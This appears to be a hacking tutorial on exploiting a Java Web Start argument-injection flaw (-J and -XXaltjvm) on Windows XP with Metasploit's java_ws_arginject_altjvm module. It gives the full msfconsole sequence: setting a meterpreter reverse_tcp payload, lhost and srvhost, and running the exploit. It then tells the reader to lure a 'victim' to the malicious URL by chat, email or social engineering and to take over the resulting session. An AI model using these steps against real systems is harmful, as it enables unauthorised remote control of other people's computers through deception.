This module exploits a flaw in the Web Start Plugin component of Sun Java Web Start. The arguments passed to Java Web Start are not properly validated. By passing the lesser known -J option, an attacker can pass arbitrary options directly to the Java runtime. By utilizing the -XXaltjvm option, as discussed by Ruben Santamarta, an attacker can execute arbitrary code in the context of an unsuspecting browser user. This vulnerability was originally discovered independently by both Ruben Santamarta and Tavis Ormandy. Tavis reported that all versions since version 6 Update 10 "are believed to be affected by this vulnerability." In order for this module to work, it must be run as root on a server that does not serve SMB. Additionally, the target host must have the Web Client service (WebDAV Mini-Redirector) enabled.
Exploit Targets
Java 6 Standard Edition Update 18
Windows XP SP 2
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/java_ws_arginject_altjvm
Msf exploit (java_ws_arginject_altjvm)>set payload windows/meterpreter/reverse_tcp
Msf exploit (java_ws_arginject_altjvm)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (java_ws_arginject_altjvm)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (java_ws_arginject_altjvm)>exploit
Now an URL you should give to your victim http://192.168.1.2
Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“